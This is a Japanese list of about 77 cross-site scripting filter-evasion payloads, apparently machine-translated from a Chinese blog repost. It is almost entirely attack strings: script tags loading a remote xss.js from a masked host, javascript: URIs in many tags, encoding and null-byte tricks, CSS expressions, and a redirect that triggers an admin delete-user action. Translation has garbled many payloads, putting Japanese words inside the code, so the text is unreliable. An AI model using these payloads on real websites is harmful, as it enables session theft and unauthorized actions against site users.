XSSスクリプトの概要

(1)普通的XSS JavaScriptの注入
<SCRIPT SRC = HTTP://***/XSS/xss.js> </ SCRIPT>

(2)JavaScriptを使用してIMGタグコマンドXSS
<SCRIPT SRC =のhttp:// *** / XSS / xss.js> </ SCRIPT>

(3)IMGタグなしなしセミコロン引用符
<IMG SRC =ジャバスクリプト:警告( 'XSS')>

(4)IMGタグの大文字と小文字を区別しない
<IMG SRC = JAVASCRIPT:アラート( 'XSS')>

(5)HTMLコード(セミコロンがなければならない)
、<IMG SRC =はJavaScript:警告( "XSS")>

(6)補正欠陥IMGタグ
<IMG "" "> <SCRIPT >警告(" XSS ")</ SCRIPT>">

(7)formCharCodeタグ(計算)
<IMG SRC = JavaScriptの:アラート(に、String.fromCharCode(88,83,83))>

Unicodeエンコーディング(8)UTF-8(計算)
<JAVへ= IMG SRC ..省略..S「)>

Unicodeエンコーディング(9)UTF-8セミコロンされていない7ビット(計算)
<= JAVにIMG SRC ..省略..S「)>

(10)は、セミコロン進コード(計算)されていない
<IMG&X6A SRC =&###&X61 X76 X61&#省略.. ..&#X58&#X53& #X53&#X27&#X29>

(11)インレイは、Javascriptが分離
<IMG SRC = "JAV ascript:警告( 'XSS');">

(12)埋め込み符号化されたラベルは、Javascriptが分離
<IMG SRC = "JAV ascript:アラート( 'XSS');">

(13)埋め込み改行
<IMG SRC = "JAVのascript:アラート( 'XSS');">

埋め込まれた(14)ENTER
<IMG SRC = "JAV ascript:警告( 'XSS');">

(15)極端な例XSSで埋め込まれたJavaScript、複数列のを注入
<IMG SRC = "ジャバスクリプト:アラート ( 'XSS')">

(16)解决限制字符(要求同页面)
<スクリプト> Z = 'ドキュメント' </ SCRIPT>
<SCRIPT> Z = Z + 'ライト(「 '</ SCRIPT>
<SCRIPT> Z = Z +'<スクリプト' < /スクリプト>
<スクリプト> Z = Z + 'SRC = HT '</スクリプト>
<スクリプト> Z = Z +' TP:// WW '</スクリプト>
<スクリプト> Z = Z + </スクリプト>' w.shell'
<スクリプト> Z = Z +」。ネット/ 1。 '</ SCRIPT>
<SCRIPT> Z = Z +' JS> </ SC '</ SCRIPT>
<SCRIPT> Z = Z +' RIPT>」) '</ SCRIPT>
<スクリプト> eval_r(Z)</ SCRIPT>

(17)null文字
のperl -e '印刷"<IMG SRC = Javaの\の0script:警告(\" XSS \ ")>";'>アウト

(18)2ヌル文字、国のヌル文字は、実質的に利用すべきところ効果がないので。
Perlの-e '印刷"<SCR \ 0IPT>アラート(\" XSS \ ")</ SCR \ 0IPT>が";'> OUT

スペースとメタ前(19)IMGタグ
<IMG SRC = "JavaScriptを:アラート( 'XSS');">

(20)非アルファ非桁XSS
<SCRIPT / XSS SRC =」HTTP://***/XSS/xss.js」> </ SCRIPT>

2(21)非アルファ非桁XSS
<BODYのonloadイベント#$%&()*〜+ -_、:;!。?@ [/ | \] ^ `=警告(「XSS」)>

(22)非アルファ非桁XSS 3
<SCRIPT / SRC =」HTTP://***/XSS/xss.js」> </ SCRIPT>

(23)オープンブラケットビス
<< SCRIPT>警告( "XSS" ); // << / SCRIPT>

(24)なし終了スクリプトタグ(Firefoxや他のブラウザのみ)
<SCRIPT SRC = HTTP://***/XSS/xss.js <B>?

(25)無端スクリプトタグ2と
<SCRIPT *** // = SRC / XSS / xss.js>

(26)ハーフオープンHTML / JavaScriptのXSS
<IMG SRCは= "JavaScriptを:アラート( 'XSS')"

(27)二重開角括弧
<IFRAME SRC = HTTP://***/XSS.html <

単一引用符無し(28)は、二重セミコロンマーク
<SCRIPT> A = / XSS /
アラート(a.source)</ SCRIPT>

(29)JavaScriptのフィルタリングエスケープ
「\を、アラート( 'XSS'); //

(30)タイトル終了タグ
</ TITLE> <SCRIPT>警告 ( "XSS"); </ SCRIPT>

(31)入力画像
<INPUTのSRC =」ジャバスクリプト:警告( 'XSS');」>

(32)BODYイメージ
<BODYのBACKGROUND =」ジャバスクリプト:警告( 'XSS')」>

(33)BODYタグ
<BODY( 'XSS')>

(34)IMG DYNSRC
<IMG DYNSRC =」ジャバスクリプト:アラート( 'XSS')」>

(35)IMG LOWSRC
<IMG LOWSRC =」ジャバスクリプト:警告( 'XSS')」>

(36)BGSOUND
<BGSOUND SRC =」ジャバスクリプト:アラート( 'XSS');」>

(37)スタイルシート
<LINK REL =」スタイルシート」HREF =」javascriptの:アラート( 'XSS');」>

(38)リモートスタイルシート
<LINK REL = "スタイルシート" HREF = "のhttp:// *** / xss.css">

(39)一覧形式画像(列表式)
<STYLE>のLi {リストスタイル画像:URL(「ジャバスクリプト:アラート( 'XSS')」);} </ STYLE> <UL> <LI> XSS

(40)IMGのVBscript
<IMG SRC = 'のVBScript:メッセージボックス( 『XSS』)'> </ STYLE> <UL> <LI> XSS

(41)META链接URL
<META HTTP-EQUIVは= CONTENT =」0」リフレッシュ」。URL =のhttp://; URL =ジャバスクリプト:警告( 'XSS');」>

(42)Iフレーム
<IFRAME SRC =」ジャバスクリプト:アラート( 'XSS');」> </ IFRAME>

(43)フレーム
<FRAMESET> <FRAMEのSRC =」ジャバスクリプト:アラート( 'XSS');」> </ FRAMESET>

(44)表
<表の背景=」ジャバスクリプト:アラート( 'XSS')」>

(45)TD
<TABLE> <TD背景=」ジャバスクリプト:アラート( 'XSS')」>

(46)DIV背景画像
<DIV STYLE =」背景画像:なし)」>

(47)DIVの背景画像に加えて余分な文字(I -32・39・34は160&&&12288&8192から8・13は65279である)後に
<DIV STYLE = "背景画像:なし)">

(48)DIV式
<DIVのSTYLE =」幅:expression_r(警告( 'XSS'));」>

(49)STYLE属性スピン式
<IMG STYLE = "XSS:expression_r (警告( 'XSS'))">

(50)匿名STYLE(組成:オープン角度と文字で始まる番号)
<XSS STYLE = "XSS:expression_r(アラート( 'XSS'))">

(51)スタイル背景画像
<STYLE> .XSS {背景画像:なし」);} </ STYLE> <A class="XSS"> </A>

(52)IMG STYLEな実施形態の
exppression(アラート( "XSS") )「>

(53)スタイル背景
<STYLE> <STYLEタイプ=」テキスト/ CSS」> BODY {背景:URL( 『ジャバスクリプト:アラート( 'XSS')』)} </ STYLE>

(54)BASE
<BASE HREF =」javascriptの:警告( 'XSS'); //」>

(55)EMBEDタグを、あなたはXSS組み込むFLASH、埋め込むことができます
。</ EMBED>:<EMBED SRC = "// *** / XSS / xss.swf HTTP">を

(56)あなたのコードに入るフラッシュActionScrpt XSSで使用することができ
; = "GET" A
B = "URL(\" ";
:; C =" JavaScriptの"
D ="; \アラート( 'XSS')「) 「;
eval_r(A + B + C + D)。

(57)XML namespace.HTCは、1台のサーバー上にあなたのXSSのベクトルを提出しなければならない
。<XSS HTMLのxmlns>
<インポート名前空間= "XSS"実装= "HTTP://***/XSS/xss.htc"? >
<XSS:XSS> XSS </ XSS:XSS>
</ HTML>

(58)あなたのフィルタJS JSコードであれば、使用する画像を追加することができます
。<SCRIPT SRC = ""> < / SCRIPT>

(59)IMG埋め込みコマンド、任意のコマンドを実行し
、<IMG SRC = "http://www.XXX.com/a.php?a=b">

(60)IMG組み込みコマンド(同じサーバー上のa.jpg)
リダイレクト302 /a.jpg  http://www.XXX.com/admin.asp&deleteuser

(61)シンボルフィルタ約
<SCRIPT A = ">" SRC = "HTTP:// *** / xss.js"> </ SCRIPT>

(62)
<SCRIPT =」>」SRC =」HTTP://***/xss.js」> </ SCRIPT>

(63)
<SCRIPTのA =」>」」SRC =」HTTP://***/xss.js」> </ SCRIPT>

(64)
<SCRIPT「= '>'」SRC =」HTTP://***/xss.js」> </ SCRIPT>

(65)
<SCRIPT Aは= '>' SRC =」HTTP://***/xss.js」> </ SCRIPT>

(66)
<SCRIPT A =」> ">」SRC =」HTTP://***/xss.js」> </ SCRIPT>

(67)
<SCRIPT>のdocument.write(「<SCRI」); </ SCRIPT> PT SRC =」HTTP://***/xss.js」> </ SCRIPT>

(68)URL绕行
<A HREF="http://127.0.0.1/"> XSS </A>

(69)URL编码
<A HREF="http://***"> XSS </A>

(70)IP十进制
<A HREF="http://3232235521"> XSS </A>

(71)IP進
<AHREF="http://0xc0.0xa8.0×00.0×01">XSS </A>

(72)IP八进制
<A HREF="http://0300.0250.0000.0001"> XSS </A>

(73)ハイブリッド符号化
<A HREF="h
TTのp://66.000146.0×7.147/""> XSS </A>

(74)节省[HTTP:]
<A HREF="//www.google.com/"> XSS </A>

(75)节省[WWW]
<A HREF="http://google.com/"> XSS </A>

(76)絶対絶対点DNS
<A HREF="http://www.google.com./"> XSS </A>

(77)JavaScriptの链接
<A HREF="javascript:document.location='http://www.google.com/'"> XSS </A>

おすすめ

転載: www.cnblogs.com/kuaile1314/p/11223078.html